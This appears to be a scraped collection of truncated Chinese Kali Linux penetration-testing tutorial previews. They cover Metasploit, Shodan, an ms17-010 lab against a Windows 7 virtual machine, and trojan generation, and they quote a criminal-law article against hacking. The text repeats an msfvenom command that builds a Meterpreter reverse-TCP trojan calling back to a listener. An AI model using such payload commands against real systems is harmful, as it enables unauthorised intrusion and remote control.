💀KaLi做木马渗透实战案例💀🛑郑重声明此文章可能会包含敏感以及危险的命令❗❗❗命令有风险，回车需谨慎。此文章仅供学习交流与参考使用，禁止运用于任何非法行动或测试中，若有预期之外的后果，将不承担任何责任！！❌ERHE再次进行警告与提醒！┌──(root💀KaLi-Erhe)-[~]└─#cat重要的事情说三遍❗❗❗⭕命令有风险，回车需谨慎❗⭕命令有风险，回车需谨慎❗⭕命令有风险，回车需谨慎❗🐱‍👤一、Metasploit高级渗透测试我们自前学习了主动信息收集和被动信息收集，而且还学习了漏洞检测工具NESSUS，接下来一起尝试使用Metasploit来对目标进行信息收集，这个过程包含了前面所有的

众所周知，信息安全人员需要学习渗透工具，我们作为小白目前最好的选择就是Kali。kali是一种Linux系统，是专门用来渗透测试，内置600多种渗透工具：如nmap，wireshark,Metasploit.......，接下来给大家介绍2种安装方式。方式一：系统镜像安装方法二：虚拟机安装前期工作：虚拟机安装(这里我使用VMware16pro)：我们可以在VMware官网中进行下载安装包。具体安装过程与平常安装相同可以根据自己需求进行自定义安装。许可证密钥可以自己baidu。方法一：系统镜像安装：我们进入kali官网，选择InstallerImages可根据自己需求选择64位，32位。因为ka

目录一、简介1.1、概述：二、使用2.1、过滤语法City、Country命令HOSTNAME命令NET命令Title命令关键字搜索组合搜索其他搜索术语2.2、Metasploit实现Shodan搜索(1)注册(2)获取API(3)启动PostgreSQL服务(4)启动Metasploit服务(5)启动MSF终端(6)选择模块(7)配置参数(8)启动搜索引擎一、简介1.1、概述：Shodan是互联网上最强人的一个搜索引学工具。该工具不是在网上搜索网址，而是直接搜索服务器。Shodan可以说是一款＂黑暗＂谷歌，一直不停的在寻找心所有和互联网连接的服务器、摄像头、打印机和路由器等。每个月都会在大约

注意：本实验实在虚拟机中完成，旨在技术交流学习请勿用于任何违法犯罪的活动中；任何未经同意授权的渗透测试均为违法行为；实验目的：使用kali通过msfconsole工具，利用ms17-010漏洞获取靶机shell，创建账户远程登录到目标靶机上。实验环境：虚拟机环境下攻击机：linuxkali（IP：10.10.10.3）靶机：windows7企业版（IP:10.10.10.11）实验过程：1、我们首先使用nmap工具对目标靶机进行端口扫描，确认是否存在漏洞端口445号开启；通过上图我们可以看到存在445端口开启的情况。接着我们使用msfconsole工具对目标靶机进行漏洞扫描；（1）搜索漏洞工具

前期准备准备一台Ubuntu虚拟机ubuntu20.04ubuntu20.04解压即用已安装vm-tools用户名base密码baseapt已换源克隆出另一台Ubuntu如果无法从主机复制粘贴到Ubuntu，执行以下命令并重启sudoaptinstallopen-vm-tools-desktop准备一台kali由于Ubuntu无Wireshark，所以需要在软件商店里安装Wireshark，kali自带Wireshark。Ubuntu配置telnetkali安装netwoxsudoapt-getinstallnetwox如果报错，使用sudoapt-getupdate，若还不行，使用sudoa

1安装VMware15.5,kali系统，桥接模式链接：https://pan.baidu.com/s/1Y3ftPnzCj0NaMQNDAhIUjw 提取码：3k2w 2修改sshd_configvim/etc/ssh/sshd_config去掉这两行注释完成后保存esc:wq!重启SSH服务/etc/init.d/sshrestart FinalShell链接成功，如下图提权/查看ipsudosuifconfig生成木马msfvenom-pwindows/meterpreter/reverse_tcplhost="192.168.71.128"lport=5000-fexe-o/root/

1安装VMware15.5,kali系统，桥接模式链接：https://pan.baidu.com/s/1Y3ftPnzCj0NaMQNDAhIUjw 提取码：3k2w 2修改sshd_configvim/etc/ssh/sshd_config去掉这两行注释完成后保存esc:wq!重启SSH服务/etc/init.d/sshrestart FinalShell链接成功，如下图提权/查看ipsudosuifconfig生成木马msfvenom-pwindows/meterpreter/reverse_tcplhost="192.168.71.128"lport=5000-fexe-o/root/

《中华人民共和国刑法》第二百八十六条违反国家规定，对计算机信息系统功能进行删除、修改、增加、干扰，造成计算机信息系统不能正常运行，后果严重的，处五年以下有期徒刑或者拘役；后果特别严重的，处五年以上有期徒刑。违反国家规定，对计算机信息系统中存储、处理或者传输的数据和应用程序进行删除、修改、增加的操作，后果严重的，依照前款的规定处罚。故意制作、传播计算机病毒等破坏性程序，影响计算机系统正常运行，后果严重的，依照第一款的规定处罚。单位犯前三款罪的，对单位判处罚金，并对其直接负责的主管人员和其他直接责任人员，依照第一款的规定处罚。第二百八十六条之一网络服务提供者不履行法律、行政法规规定的信息网络安全管

安装docker环境（一定要在用户目录下）1、进入root用户，输入命令“docker”检查是有docker环境docker2、如果没有docker环境，则按提示输入命令aptinstalldocker.io，若有安装则直接跳至第二安装ARL输入命令后有可能会出现以下情况：解决办法：输入apt-getupdate更新命令，更新完毕后再执行“aptinstalldocker.io”安装注：在这只输入提示的第一条命令就好，勿安装podman，否则后面运用docker会出现冲突3、安装完毕后，输入“dockerversion”查看docker版本，若显示版本信息则表示安装成功dockerversio

安装docker环境（一定要在用户目录下）1、进入root用户，输入命令“docker”检查是有docker环境docker2、如果没有docker环境，则按提示输入命令aptinstalldocker.io，若有安装则直接跳至第二安装ARL输入命令后有可能会出现以下情况：解决办法：输入apt-getupdate更新命令，更新完毕后再执行“aptinstalldocker.io”安装注：在这只输入提示的第一条命令就好，勿安装podman，否则后面运用docker会出现冲突3、安装完毕后，输入“dockerversion”查看docker版本，若显示版本信息则表示安装成功dockerversio